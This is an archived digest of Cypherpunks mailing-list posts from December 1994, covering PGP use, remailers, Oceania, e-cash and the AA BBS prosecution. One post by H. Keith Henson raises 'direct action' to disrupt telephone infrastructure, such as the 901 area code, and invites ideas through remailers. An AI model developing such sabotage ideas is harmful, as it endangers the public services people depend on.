Then again, it may just belong in the "highly speculative" category. Much like the rich market now existing in Cuban property -- tied, of course, to a particular group that promises to overthrow Castro, then declare the property yours once the dictatorship is in place.

Of course, for the price of Oceania, you could put together a nice "offshore" communications satellite.

nathan

From khijol!erc Mon Dec 5 08:11:08 1994
From: khijol!erc (Ed Carp [Sysadmin])
Date: Mon, 5 Dec 94 08:11:08 PST
Subject: public accounts / PGP / passphrases
In-Reply-To: <199412051024.FAA00972@bb.hks.net>
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

> Could you clarify where the `clean' copy of the hash of the OS is being
> stored, if not on the machine in question ?

On CD-ROM, or on removable media which *you* control access.

> I must confess that I'm not personally prepared to push my machine into an
> early grave by rebooting before I sign or encrypt anything. Besides, I'd be
> pushing _myself_ into an early grave if I did that. YMMV.
>
> I have a 386 at home, on which I suppose I could run PGP, but that doesn't
> help. Why ? Simply because going home to dial in is a major inconvenience.
> Leaving aside my unwillingness to stay home in the evening just to use my
> public account, it's utterly impossible for me to leave work during the
> day whenever I want to use PGP. The only solution I can imagine is to keep
> a notebook computer running Linux at work, and dial in to the DECstation
> five feet away from my desk at work.
> I've no idea how to convince the tech
> staff here to add a dedicated phone line to my lab for this purpose. Any
> better suggestions on using PGP safely during the workday ?

What's the matter with running a serial cable from your laptop to the DEC?

- --
Ed Carp, N7EKG Ed.Carp at linux.org, ecarp at netcom.com
Finger ecarp at netcom.com for PGP 2.5 public key an88744 at anon.penet.fi
** PGP encrypted email preferred! **
"What's the use of distant travel if only to discover - you're homeless in your heart." --Basia, "Yearning"

From jcorgan at netcom.com Mon Dec 5 08:35:09 1994
From: jcorgan at netcom.com (Johnathan Corgan)
Date: Mon, 5 Dec 94 08:35:09 PST
Subject: cypher bickering
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

>In the paper world, I send out many things that I don't sign. I
>don't sign them because it is of no significance that it be proven that I sent
>it. It also might be that the information is of such a general nature that it
>makes no neverminds who sent it. I submit that digital signatures are the same
>way.

While I agree with this, there is another, more practical reason to use cryptography for everyday, non-sensitive material. This may seem trivial to some.

The more we are in the practice and *habit* of using cryptography for both privacy and authentication, the more *prepared* we are when we unexpectedly find ourselves in situations that *require* cryptography.

YMMV.
=======================================================================
Johnathan Corgan       "Violence is the last refuge of the incompetent"
jcorgan at netcom.com                                     -Isaac Asimov

PGP Public Key: http://www-swiss.ai.mit.edu/~bal/pks-toplev.html
Or send email to: pgp-public-keys at pgp.ai.mit.edu Subj: GET jcorgan
=======================================================================

From sinclai at ecf.toronto.edu Mon Dec 5 08:38:17 1994
From: sinclai at ecf.toronto.edu (SINCLAIR DOUGLAS N)
Date: Mon, 5 Dec 94 08:38:17 PST
Subject: Oceania?
In-Reply-To: <199412050839.AAA11133@netcom18.netcom.com>
Message-ID: <94Dec5.113742edt.3454@cannon.ecf.toronto.edu>

-----BEGIN PGP SIGNED MESSAGE-----

I used to be on the Oceania mailing list. From what I can tell, these guys are serious. I must admit, I was taken with the idea. Trade a few pairs of Levis for a Soviet warship and live in international waters. This design would have taken one or two torpedoes. About the time I left, they were thinking of floating concrete domes in the Sargasso sea.

From merriman at metronet.com Mon Dec 5 08:44:04 1994
From: merriman at metronet.com (David K. Merriman)
Date: Mon, 5 Dec 94 08:44:04 PST
Subject: public accounts / PGP / passphrases
Message-ID: <199412051644.AA15039@metronet.com>

-----BEGIN PGP SIGNED MESSAGE-----

>> Leaving aside my unwillingness to stay home in the evening just to use my
>> public account, it's utterly impossible for me to leave work during the
>> day whenever I want to use PGP. The only solution I can imagine is to keep
>> a notebook computer running Linux at work, and dial in to the DECstation
>> five feet away from my desk at work. I've no idea how to convince the tech
>> staff here to add a dedicated phone line to my lab for this purpose. Any
>> better suggestions on using PGP safely during the workday ?
>
>What's the matter with running a serial cable from your laptop to the DEC?

I may have missed earlier bits of this thread, so I'll simply point out that it is quite possible to run PGP from a floppy disk - either having the entire program on floppy, or just the keys. It's what I do when I may need access from an 'unsecure' machine.
Dave Merriman

- - - - - - - - - - - - - - - - - - - - - - - - - - -
Finger merriman at feenix.metronet.com for PGP public key and fingerprint.
PGP encrypted Email welcome, encouraged, and preferred.
"Those who make peaceful revolution impossible will make violent revolution inevitable." John F. Kennedy

From lmccarth at bali.cs.umass.edu Mon Dec 5 09:14:43 1994
From: lmccarth at bali.cs.umass.edu (L. McCarthy)
Date: Mon, 5 Dec 94 09:14:43 PST
Subject: cypher bickering
Message-ID: <199412051719.MAA04083@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

William A. Kennedy writes:
> they seem to stay up through the night just to bicker about it.
Nah, we'd be up anyway ;)

Seriously, I don't think there's a practical issue, in light of the existence of Todd Masco's signing service. Perhaps at some time far in the future Eric will raise the stakes, but we can cross that bridge when we come to it. I simply changed my c'punks list alias to point to the signing service instead of the list itself, and everything else continues as before.

Regarding placing a direct SLIP connection between my machine and the nearest workstation in the office, I will investigate the option. It may again be an issue to get permission to start plugging extra cables into a machine owned by the dept.

- - -L. Futplex McCarthy; PGP key by finger or server
"We've got computers, we're tapping phone lines; I know that that ain't allowed" --Talking Heads

- ---
[This message has been signed by an auto-signing service. A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

From huntting at glarp.com Mon Dec 5 09:27:39 1994
From: huntting at glarp.com (Brad Huntting)
Date: Mon, 5 Dec 94 09:27:39 PST
Subject: Well now that we're signing...
In-Reply-To: <13848.786598675@cfd20.eng.buffalo.edu>
Message-ID: <199412051727.KAA08552@misc.glarp.com>

-----BEGIN PGP SIGNED MESSAGE-----

For all of you out there who are using MIME headers: There is now an official mime type for PGP (and an RFC to accompany it). Please don't post messages with type "text/x-pgp" or other rot anymore.
thanx,
brad

From rah at shipwright.com Mon Dec 5 09:40:44 1994
From: rah at shipwright.com (Robert Hettinga)
Date: Mon, 5 Dec 94 09:40:44 PST
Subject: ;-) The definitive argument for e$: tainted cash
Message-ID: <199412051740.MAA06424@zork.tiac.net>

Fun Facts to Know and Tell About *Your* Legal Tender...

> >From the August 1993 American Bar Association Journal
>>
>> >
>> >"The mere presence of trace amounts of cocaine on a common object ...
>> > is insufficient to support a felony conviction of cocaine." Lord v.
>> > Florida, 91-2147.
>> >
>> >"[T]he evidence of the narcotic-trained dog's alert to [tainted] currency
>> > is of extremely little probative weight. . . . It cannot be doubted that
>> > contaminated currency is widespread. The presence of trace narcotics on
>> > currency does not yield any relevant information whatsoever about the
>> > currency's history." US District Court Judge Thomas Wiseman of Nashville,
>> > Jones v. DEA, No. 3:91-0520 (April 21, 1993).
>> >
>> >"The probability that every single person in the United States is
>> > carrying drug-tainted money is almost certain." -- Dr. James Woodford,
>> > forensic chemist in Atlanta. Woodford cites a 1989 experiment by Miami
>> > toxicologist Dr. William Hearn, who gathered 135 dollar bills from banks
>> > in twelve cities. 131 had traces of cocaine.
>> >
>> >It also cites a 1985 study by the Miami Herald, which asked eleven prominent
>> >local citizens to supply a $20 bill for testing, including the Catholic
>> >archbishop, George Bush's son Jeb, and Janet Reno. Ten out of the eleven
>> >bills had traces of cocaine.
>> >
>> >Finally, there's a reference to an until-now secret 1987 DEA study showing
>> >that 1/3 of the money at the Federal Reserve Building in Chicago was
>> >tainted with cocaine. It's thought that cocaine is transferred from some
>> >bills to agencies' high-speed sorting equipment [...]

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah at shipwright.com)   "There is no difference between someone
Shipwright Development Corporation        who eats too little and sees Heaven and
44 Farquhar Street                        someone who drinks too much and sees
Boston, MA 02331 USA                      snakes." -- Bertrand Russell
(617) 323-7923

From jamesd at netcom.com Mon Dec 5 09:41:56 1994
From: jamesd at netcom.com (James A. Donald)
Date: Mon, 5 Dec 94 09:41:56 PST
Subject: Oceania?
In-Reply-To:
Message-ID: <199412051741.JAA00580@netcom8.netcom.com>

Johnathan Corgan writes
> Was this whole project a giant scam? Has this been objectively
> demonstrated, or just suspected/believed?

Some of the participants were less than truthful, to me and to others.

Was it a scam? In some cases they no doubt believed that it was all for the greater good. In other cases -- if some people made money out of it, then it was a scam. If it was not a scam, then still they pursued their goal by evil means. I doubt that anyone made money out of it.

Either way they are untrustworthy people.

Myself, I would rather be stabbed in front than behind. The man who loudly says he is your friend, and loudly points to common enemies, is seldom your friend.

The Oceania project will not succeed, though I wish it well.

There is an alternative project that might succeed, perhaps is already succeeding:

Many governments now recognize that they are incapable of governing in a fashion that permits a modern technological society. So they are leasing -- not selling, but long term leases -- regions to be governed by more competent third parties. Singapore is a major beneficiary of this.
They find government by Singapore particularly comforting because Singapore has demonstrated expertise in minimizing the dangerous infection of freedom that accompanies capitalism.

But I am happy to report the disease seems difficult to contain. Those free trade zones and special economic zones that are most successful, are those that are most thoroughly free.

--
 ---------------------------------------------------------------------
We have the right to defend ourselves and our
property, because of the kind of animals that we     James A. Donald
are. True law derives from this right, not from
the arbitrary power of the omnipotent state.         jamesd at netcom.com

From cactus at seabsd.hks.net Mon Dec 5 09:44:37 1994
From: cactus at seabsd.hks.net (L. Todd Masco)
Date: Mon, 5 Dec 94 09:44:37 PST
Subject: Oceania?
Message-ID: <199412051749.MAA04396@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

In article <199412050839.AAA11133 at netcom18.netcom.com>, Timothy C. May wrote:
>I won't say it's a scam, but a lot of people think it is/was. I
>thought it had died some months back, when all posts (of which there
>had previously been many) suddenly stopped.

They've resumed. The partners had a falling out of some sort, and the "Eric Klein" one has progressed. The Oceania posts for the last n months can be read via NNTP from nntp.hks.net, newsgroup hks.lists.oceania.

>The idea of soliciting "contributions" to fund some kind of seagoing
>barge, sinkable with a single torpedo (anonymous delivered, easily
>enough), is crazy.

They're getting more productive than that. The current plan is that they're trying to help launch a business that designs and builds sea structures. They've got some pretty good ideas, and are focusing now more on the idea of producing small tangible results that may one day build to their desired goal.

I'm still skeptical as to their chances for success, though, but if enough people with some pragmatic sense get sucked in, there is a chance...
- --
Todd Masco        | "Roam home to a dome, Where Georgian and Gothic once stood
cactus at hks.net | Now chemical bonds alone guard our blond(e)s,
cactus at bb.com  | And even the plumbing looks good." - B Fuller
- ---
[This message has been signed by an auto-signing service. A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

From peace at BIX.com Mon Dec 5 09:51:22 1994
From: peace at BIX.com (peace at BIX.com)
Date: Mon, 5 Dec 94 09:51:22 PST
Subject: PGP on a VAX
Message-ID: <9412051030.memo.41246@BIX.com>

ViaCrypt PGP is now running on a VAX. It will be released after all quality control is complete, in about 2 weeks.

From rsalz at osf.org Mon Dec 5 10:38:38 1994
From: rsalz at osf.org (Rich Salz)
Date: Mon, 5 Dec 94 10:38:38 PST
Subject: Oceania?
Message-ID: <9412051833.AA13145@sulphur.osf.org>

>They find government by Singapore particularly comforting
>because Singapore has demonstrated expertise in minimizing
>the dangerous infection of freedom that accompanies
>capitalism.

Here's something kinda spooky. An OSF staffer doing consulting with the Singapore gov't was asking about how well the DCE security server scales. They're starting a pilot program to make, from birth, every Singaporese an entity known to their server. Based on other questions, I gather the DCE identity card will be used by all gov't services.
	/r$

From rishab at dxm.ernet.in Mon Dec 5 11:06:08 1994
From: rishab at dxm.ernet.in (rishab at dxm.ernet.in)
Date: Mon, 5 Dec 94 11:06:08 PST
Subject: Remailers, RSAREF for PERL
Message-ID:

Gah! I guess Mike won't send _me_ a copy of his Perl RSA routines...

Oh well, I'll wait for some courageous soul to ftp it to garbo.
-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                           "In between the breaths is
rishab at dxm.ernet.in                        the space where we live"
rishab at arbornet.org                              - Lawrence Durrell
Voice/Fax/Data +91 11 6853410
Voicemail +91 11 3760335                 H 34C Saket, New Delhi 110017, INDIA

From rishab at dxm.ernet.in Mon Dec 5 11:07:22 1994
From: rishab at dxm.ernet.in (rishab at dxm.ernet.in)
Date: Mon, 5 Dec 94 11:07:22 PST
Subject: Digicash and currency markets - Economist
Message-ID:

Alex Strasheim : (?)
> Yes, it is granted that Digicash is in beta, and not polished. But
> beta testing usually happens after all significant functionality is
> present. The Digicash beta isn't moving real money, and that's a
> significant functional deficit.

So far I haven't seen much discussion on the monetary effect of e-cash. The best (and only) analysis I've seen was in last week's Economist (no, I don't work there, I'm only a fan) of which John Young (jya at pipeline.com) was kind enough to offer e-mail copies. I excerpt:

The Economist
November 26, 1994, pp. 21-23

[NO INTEREST ON E-CASH:]

The more disputed aspects of electronic money's future are those that relate mainly to money's other role, as a store of value. ...

If, to command confidence, electronic money had to be convertible into
legal tender on demand, then for every unit of electronic money there
would have to be a unit of cash reserved in the real economy
                                ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
...which is pretty much how the fledgling CyberCash, for example, plans to operate, requiring banks working with it to hold money converted into e-cash in an escrow account.

It follows that, in an efficient system, if each e-cash unit
represents an immobilised unit of real cash,
then positive balances of e-cash will earn no interest,
     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
because the interest they might earn would be offset by the interest foregone on the real cash that is backing them.
It also follows that, in such a system, there would be no purely virtual lending: for this would increase the stock of digital money without a corresponding increase in the stock of real money, and so undermine convertibility. The virtual economy in this phase of its development would be free from usury.

[BYPASSING REGULATED CURRENCY MARKETS:]

If you pay yen for electronic dollars in Tokyo and buy
something from a merchant based in Paris who cashes them for francs,
a currency conversion has taken place.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
That, however, is an activity towards which most governments feel highly defensive; and if e-cash started to bypass regulated foreign-exchange markets by developing its own grey market for settlement, then governments might be provoked into trying to clamp down on it. Probably, therefore, e-cash will, at least in its early forms, be denominated in single conventional currencies and exchanged at conventional market rates.

[Which wouldn't be much fun. For example, in India it's not easy for _me_ to convert rupees into dollars; 75% of dollars I earn must be converted into rupees. Assuming DigiCash takes off; I sell copies of Electric Dreams and become an e-cash millionaire. I can then buy stuff in dollars, which according to regulations I am not supposed to have. Similar problems arise in even less tightly regulated countries.

[ON A TOTALLY DIGITAL CURRENCY WITHOUT PAPER BACKING:]

It is possible to imagine the development of e-cash reaching this point, and no further. But it is also possible to imagine that the temptation to move away from a fully-backed digital money would prove irresistible. Instinct argues that people will want virtual credit, and that it must therefore find a price.

...there will come a ...
stage towards a single overarching monetary system in which convertibility into Legal tender ceases to be a condition for electronic money; and electronic money will thereby become indistinguishable from -- because it will be the same as -- other, more traditional sorts of money. Money will be money whether it is constituted as a string of digits or a piece of paper or an entry in a ledger. Some electronic money might be backed by governments, some by private issuers....

Ideally, the ultimate e-cash will be a currency without a country (or a currency of all countries), infinitely exchangeable without the expense and inconvenience of conversion between local denominations. It may constitute itself as a wholly new currency with its own denomination -- the "cyber-dollar", perhaps.....

Either way, it is hard to imagine that the existence of an international, easy-to-use, cheap-to-process, hard-to-tax electronic money will not then force freer convertibility on traditional currencies.

"We know everything about you that we need to know" - Coleta Brueck, IRS

-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                           "In between the breaths is
rishab at dxm.ernet.in                        the space where we live"
rishab at arbornet.org                              - Lawrence Durrell
Voice/Fax/Data +91 11 6853410
Voicemail +91 11 3760335                 H 34C Saket, New Delhi 110017, INDIA

From jya at pipeline.com Mon Dec 5 11:07:43 1994
From: jya at pipeline.com (John Young)
Date: Mon, 5 Dec 94 11:07:43 PST
Subject: (Fwd) Re: GATT and RSA
Message-ID: <199412051911.OAA05274@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

With Rishab's permission today I forward his answer to my query about GATT's effect on copyright of software for those of you who may want to know.

Forwarding mail by: rishab at dxm.ernet.in (Rishab Aiyer Ghosh) on Sun, 04 Dec 11:59 PM
- -------------------
Rishab writes to another poster:

> >So GATT is unlikely to affect RSA.
JY asked:

> May I assume that your remarks above indicate that you have
> details of the GATT agreement that would clarify the following
> general summaries in my local rag, The New York Times (I have
> not been able to obtain a final copy of the agreement):

US software companies benefit because GATT enforces _copyright_ including for software. Not software patents - something totally different, which is what makes PGP 2.3 illegal in the US but not so anywhere else.

Rishab

- ---
[This message has been signed by an auto-signing service. A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

From jcorgan at netcom.com Mon Dec 5 11:28:33 1994
From: jcorgan at netcom.com (Johnathan Corgan)
Date: Mon, 5 Dec 94 11:28:33 PST
Subject: Dupes?
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

This morning I seem to be getting two copies of many of the messages that have come through. Anyone else getting this?
=======================================================================
Johnathan Corgan       "Violence is the last refuge of the incompetent"
jcorgan at netcom.com  -Isaac Asimov
PGP Public Key: http://www-swiss.ai.mit.edu/~bal/pks-toplev.html
Or send email to: pgp-public-keys at pgp.ai.mit.edu Subj: GET jcorgan
=======================================================================

From hkhenson at cup.portal.com Mon Dec 5 11:31:23 1994
From: hkhenson at cup.portal.com (hkhenson at cup.portal.com)
Date: Mon, 5 Dec 94 11:31:23 PST
Subject: AA BBS - Thomases are going to jail...
Message-ID: <9412051130.1.17207@cup.portal.com>

We have a Problem . . .

H. Keith Henson

Part of the Federal Government's law enforcement mechanism is under the control of the Religious Right. By reaching out thousands of miles through cyberspace connections, the RR is using Federal power to suppress constitutionally protected activities which they find offensive.

I expect the RR people involved feel that what they are doing is fair return for Federal power being used to suppress the school Christmas pageant in a thousand sleepy little towns in middle America--and less dangerous than offing abortion doctors, or killing gays.

Most of you reading these groups are familiar with the AA BBS case. In a nutshell, a postal inspector in Memphis called Amateur Action BBS in California, downloaded a dozen files, ordered other stuff, shipped the sysop some unsolicited kiddy porn, then arrested the sysop (Robert Thomas) and his wife (Carleen) for kiddy porn and (by Memphis standards) obscenity.

They were tried in Memphis last summer by an obviously biased court.
(The judge and prosecutor made no attempt to hide their longstanding mutual admiration.) The Memphis jury found the sysop and his wife guilty of obscenity, but even they couldn't buy the kiddy porn charges, and acquitted on that charge.

Friday (Dec. 2, 1994), in the worst perversion of justice I have ever witnessed, the sysop and his wife were sentenced to three years. They were lucky to get that little time. I got a look at the pre-sentencing report. (I may be able to post some of it later.) The recommended sentence included about twice this amount of time based on the kiddy porn charge they were *acquitted* of.

Those reports are simply *amazing*. They cover family members and history out a generation or so in all directions, not to mention school, medical records, tax filings, and any police record--even if you were found innocent! It seems to be the function of these things to put your entire life in the worst possible light. Someone should take the form and do one for Christ just prior to the Crucifixion. It would run something like: ". . . questionable father, . . low class occupation (carpenter), . . . accused of impersonating a doctor by healing sick, . . . known to associate with low class persons, . . . travels about (vagabond), . . ."

Back to the problem.

I find the situation intolerable--without having a clear idea of how to deal with it. With little more effort (though a lot more skill than the postal inspector demonstrated) the RR-controlled Feds can create crime and venue problems for just about anyone running a BBS or net node.

Certainly *any* system which carries alt.sex.* is subject to the same treatment by the Religious Right (in the guise of the Memphis Feds) as AA BBS. In fact, the very .gifs that were found obscene in Memphis were made "freely distribute," by Robert and have been posted *many* times to the net.

Could we use economic retaliation?
I won't use Federal Express any more because it and Graceland (and the cat houses near Graceland) seem to be the economic mainstays of Memphis. Unfortunately, even a very effective economic boycott is not going to have an effect on the zealots, and depressing that area further might make it an even *more* repressive backwater because the last of the intelligent/tolerant people would move out.

On the other hand, economic pressures might induce the more sensible part of the community to pressure the zealots into being more tolerant (at least of people 3 time zones away!). In recent years economic pressure has induced two states to change laws. A positive sign that economic pressure might be effective is that the local newspaper did *not* support the prosecution. Research question: Why did the Memphis Feds back off after the Deep Throat trials?

Is the law any help? After nearly a year of watching the process, I am *quite* pessimistic. In its own way, the court system is deeply corrupt. I think even the RR folks know this is a political case and not a criminal one. In political cases, leaving a person out on bail during appeal is normal, but in this case, it is very much in the government's interest to have Robert out of circulation so he cannot pursue the Electronic Communication Privacy Act suit and other causes of action against them in civil court. Robert's motion for bail during appeal was denied.

Are there political routes? Yes, but chancy. It is possible that a political fight with the RR might backfire and result in heavy restrictions on the nets. Coming down hard on the nets would be very popular with the Administration forces after the Clipper debacle. The power of the net to organize political force must be quite worrying to those in power. (It is clear to me that modern day revolutions, anywhere in the world, and peaceful or not, would be organized through the net. In some places this has already happened.)
It may be that a general cutting down on the powers of the Federal Government is in order. This has pros and cons, and support (in some areas) even from the RR. How *does* one shrink the unshrinkable? Tax revolts (in the form of massive political pressure) seem to come about when the tax rates get as high as they are now. Another possibility is that the formation of private money may greatly shrink the ability of governments everywhere to collect taxes.

Should people start thinking about direct action? I hope we don't come to this! There is nothing I can think of worse than arousing the technically knowledgeable to take the infrastructure apart. Problem is that pinpoint damage (like taking the 901 area code down for a few days or weeks) is somewhere between impossible and probably impossible. (Though ATT managed to take down their entire phone network for a day with a missing "case" statement.)

Your thoughts and suggestions would be appreciated. Please post encrypted through a remailer chain if you absolutely *must* post ideas about the last paragraph!

From talon57 at well.sf.ca.us Mon Dec 5 11:52:07 1994
From: talon57 at well.sf.ca.us (Brian D Williams)
Date: Mon, 5 Dec 94 11:52:07 PST
Subject: better than Oceania
Message-ID: <199412051951.LAA02901@well.sf.ca.us>

'punksters,

Far more interesting than Oceania is the Millennial Project. It is not only in its second revised edition, but has a very active BBS and hopes to be a list on the net soon (they're looking for an assist with this so anyone who can help them out, would be appreciated) They have also had two national gatherings, and the group has numerous engineers running various planning committees, and they have downloadable spreadsheets on various aspects.

It is a definite breath of fresh air from all the doomsayers out there. They also have a healthy respect for privacy and encryption.

The book is available at any good bookstore.

"The Millennial Project" seven easy steps to colonizing the Galaxy by Marshall Savage.

Brian Williams
Extropian
Cypherpatriot

"Cryptocosmology: Sufficiently advanced communication is indistinguishable from noise." --Steve Witham

"Have you ever had your phones tapped by the government? YOU WILL and the company that'll bring it to you.... AT&T" --James Speth

From raph at netcom.com Mon Dec 5 11:53:48 1994
From: raph at netcom.com (Raph Levien)
Date: Mon, 5 Dec 94 11:53:48 PST
Subject: PGP MIME type (was Well now that we're signing...)
In-Reply-To: <199412051727.KAA08552@misc.glarp.com>
Message-ID: <199412051953.LAA03423@netcom11.netcom.com>

Brad Huntting writes:

> For all of you out there who are using MIME headers: There is now
> an official mime type for PGP (and an RFC to accompany it). Please
> don't post messages with type "text/x-pgp" or other rot anymore.

Where? Which RFC? I just checked the IANA media-types directory (at ftp://ftp.isi.edu/in-notes/iana/assignments/media-types), and there was no PGP type listed. I also searched through recent RFC titles, and found nothing appropriate.

There is of course a draft by Nat Borenstein et al, but it is not an official RFC yet. Therefore, it is not valid MIME. Last I heard, it was taking a fairly low priority. The draft doesn't address the fact that a clearsigned message is readable text, and therefore should be text/pgp rather than application/pgp. He is planning to fix this.

My premail software generates the application/x-pgp type, which _is_ valid MIME. So is text/x-pgp, which I don't support yet because premail 0.30 doesn't do clearsigning (hopefully, the next release will). I am eager to switch to the official MIME type as soon as it is out.

If anyone knows better, please let me know.

Raph

From merriman at metronet.com Mon Dec 5 12:40:11 1994
From: merriman at metronet.com (David K. Merriman)
Date: Mon, 5 Dec 94 12:40:11 PST
Subject: ;-) The definitive argument for e$: tainted cash
Message-ID: <199412052040.AA18252@metronet.com>

-----BEGIN PGP SIGNED MESSAGE-----

FWIW:

A similar experiment done here in the DFW area a few weeks ago. 4 of 11 bills tested "positive" by DEA coke-sniffing machinery.

Dave Merriman

- - - - - - - - - - - - - - - - - - - - - - - - - - -
Finger merriman at feenix.metronet.com for PGP public key and fingerprint.
PGP encrypted Email welcome, encouraged, and preferred.
"Those who make peaceful revolution impossible will make violent revolution inevitable." John F. Kennedy

From pcw at access.digex.net Mon Dec 5 12:42:07 1994
From: pcw at access.digex.net (Peter Wayner)
Date: Mon, 5 Dec 94 12:42:07 PST
Subject: (Fwd) Re: GATT and RSA
Message-ID: <199412052041.AA00620@access3.digex.net>

I want to know whether GATT will affect the export of encryption software. It seems to frown upon any barrier to trade and I think I could argue, perhaps not correctly, that if ACME in Taiwan can't buy the necessary encryption software to do business with CENTRAL in Kansas, then ACME is prevented from competing in America. BONEHEAD Inc, from North Dakota won't have to worry about foreign competition.

This means that either there can be no secure international EDI standard that anyone can use to do business or there will be trade barriers to foreigners interacting with American firms.

Of course, this is just a random conjecture based upon a conversation I had with Dave Banisar. Is it silly? Or sensible? I'm sure there are exemptions for military hardware, but heck, when it comes down to it food is the ultimate strategic resource.
Where does crypto lie in this spectrum? Everyone knows where it lies in the eyes of the NSA. Where does it lie in other people's reality?

-Peter

From lcottrell at popmail.ucsd.edu Mon Dec 5 13:11:05 1994
From: lcottrell at popmail.ucsd.edu (Lance Cottrell)
Date: Mon, 5 Dec 94 13:11:05 PST
Subject: PGP Tools under Linux (Pr0duct Cypher)
Message-ID: <199412052110.NAA24226@ucsd.edu>

-----BEGIN PGP SIGNED MESSAGE-----

To: Pr0duct Cypher

Pr0duct Cypher writes:
>I wrote:
>>I am using PGPTools to handle all the crypto functions in the second
>>generation remailer that I have written. All the copies of PGPTools that I
>>have found seem to be set up to compile on SUN workstations only.
>
>That's interesting, because I developed it under Linux and MS/DOS, and there
>was a lot of trouble at the beginning with it not running on big-endian
>machines. It sounds like whoever "fixed" it for sparcs broke it for
>little-endian machines. The original should still be on ftp.csn.net; get it
>there and it should work.
>
>>Mixmaster is both a remailer and a front end, and therefore must run on many
>>different platforms. I have been able to compile PGPTools on Linux and
>>FreeBSD, but PGPTools produces invalid RSA blocks. If you (or anyone else
>>reading this) have ported PGPTools to other platforms could you send me the
>>source and makefile, or point me to them. If not, could you help me do it,
>>the source code is a tangle, and it will take me a long time to do on my own
>>(I am a brute force programmer, not a C wizard).
>
>Get the original, test it, and post the results.
>
> - Pr0duct Cypher

Ok, I grabbed second oldest version (this included a bugfix). It compiles and seems to work fine when I use it with PTD. It fails when run under Mixmaster. The failure is deep inside pgptools. When I call pgpk_findkey to get a key from a public key ring (by name not number), it chugs along checking each key id in the ring. Each time it checks a key, it uses a pair of fifo's which it then destroys.
After checking the second id, when it is destroying kc (k is destroyed
without problems both times), I get a segmentation violation in the line

    nfb=fb->next;

Since kc was simply a copy of k

    kc=fifo_copy(k);

I suspect the problem lies in fifo_copy. These are all mem fifo's.

If you want to look at the source code I am playing with (with tons of
debugging printfs in it) let me know and I will stick it on my ftp.

-----BEGIN PGP SIGNATURE-----
Version: 2.6
-----END PGP SIGNATURE-----
--
Lance Cottrell http://nately.ucsd.edu/~loki/
Home of the remailer chaining script "chain".
PGP 2.6 key available by finger or server.
"Love is a snowmobile racing across the tundra. Suddenly it flips over,
pinning you underneath. At night the ice weasels come." --Nietzsche

From jrochkin at cs.oberlin.edu Mon Dec 5 13:26:02 1994
From: jrochkin at cs.oberlin.edu (Jonathan Rochkind)
Date: Mon, 5 Dec 94 13:26:02 PST
Subject: Remailers and "##"
Message-ID: <199412052125.QAA08290@cs.oberlin.edu>

I know there's some kind of a syntax you can use involving "##", with some
of the remailers, and the remailer will insert a header line into the
message. But I'm having trouble figuring out what syntax this is. Can
anyone help me out?

From frissell at panix.com Mon Dec 5 13:26:30 1994
From: frissell at panix.com (Duncan Frissell)
Date: Mon, 5 Dec 94 13:26:30 PST
Subject: AA BBS - Thomases are going to jail...
Message-ID: <199412052124.AA14970@panix.com>

At 11:30 AM 12/5/94 PST, hkhenson at cup.portal.com wrote:

>Part of the Federal Government's law enforcement mechanism is under
>the control of the Religious Right.

Stuff about the AA BBS bust elided.

One should note that this prosecution is similar to others carried out
against the sellers of physical visual pornography for years.
The stings have been carried out by both Republican and Democratic federal
prosecutors usually in border states. They started before there was an
official Religious Right. The US Attorney in this case may have been a
Democrat since most Republicans were replaced by Clinton. He, she, or it
is probably not a member of the RR.

>I find the situation intolerable--without having a clear idea of how
>to deal with it.

There will be an appeal.

>Certainly *any* system which carries alt.sex.* is subject to the same
>treatment by the Religious Right (in the guise of the Memphis Feds) as
>AA BBS. In fact, the very .gifs that were found obscene in Memphis
>were made "freely distribute," by Robert and have been posted *many*
>times to the net.

That will be an interesting case.

DCF

*************************************************************************
ATMs, Contracting Out, Digital Switching, Downsizing, EDI, Fax, Fedex,
Home Workers, Internet, Just In Time, Leasing, Mail Receiving, Phone
Cards, Quants, Securitization, Temping, Voice Mail.

From cactus at hks.net Mon Dec 5 13:58:03 1994
From: cactus at hks.net (L. Todd Masco)
Date: Mon, 5 Dec 94 13:58:03 PST
Subject: Privacy seminar
Message-ID: <199412052202.RAA00842@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

Has the privacy seminar been dropped? Last message I've seen from it was
November 5.

Thanks,
-- Todd

- ---
[This message has been signed by an auto-signing service. A valid
signature means only that it has been received at the address
corresponding to the signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service
-----END PGP SIGNATURE-----

From wcs at anchor.ho.att.com Mon Dec 5 15:04:53 1994
From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204)
Date: Mon, 5 Dec 94 15:04:53 PST
Subject: Oceania?
Message-ID: <9412052037.AA07049@anchor.ho.att.com>

The Oceania folks may or may not have been serious; I don't know them well
enough to judge. If they were serious, they weren't competent - nowhere in
their literature did I see anything that implied that the question "Can I
look at your financial plans?" would get a useful answer.

The primary gamble for Oceania is that you could set up a country without
having a piece of dirt to anchor it to and get other governments to treat
it as a government, rather than getting the US government to treat it as a
drug-running boat on the high seas (i.e. target for Coast Guard piracy),
or getting some other government or free-market pirates interested.
(Secondary gambles are things like financial stability, hurricanes, etc.)

One of their magazines had an article on a floating hotel built by Sven
somebody that's recently been anchored off Vietnam. Rather than trying to
raise $1B or so to build The Raft and gamble on not losing it all to
governments or other pirates, you could make the same gamble by buying the
floating hotel for $25-50M, which you might even be able to talk some rich
investor into coughing up in return for a slice of the pie. That'd be
enough to know if it works, get your satellite dish up, and see if you can
convince a hundred or so enthusiasts to move there, run a gambling casino,
and make back some bucks to pay some dividends for your investors and hire
a few mercenaries to protect the place.
